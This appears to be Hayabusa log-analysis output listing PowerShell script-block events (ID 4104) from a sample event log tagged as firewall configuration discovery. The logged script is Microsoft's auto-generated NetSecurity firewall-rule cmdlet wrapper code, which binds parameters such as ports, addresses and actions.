[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletizat,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ion_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo 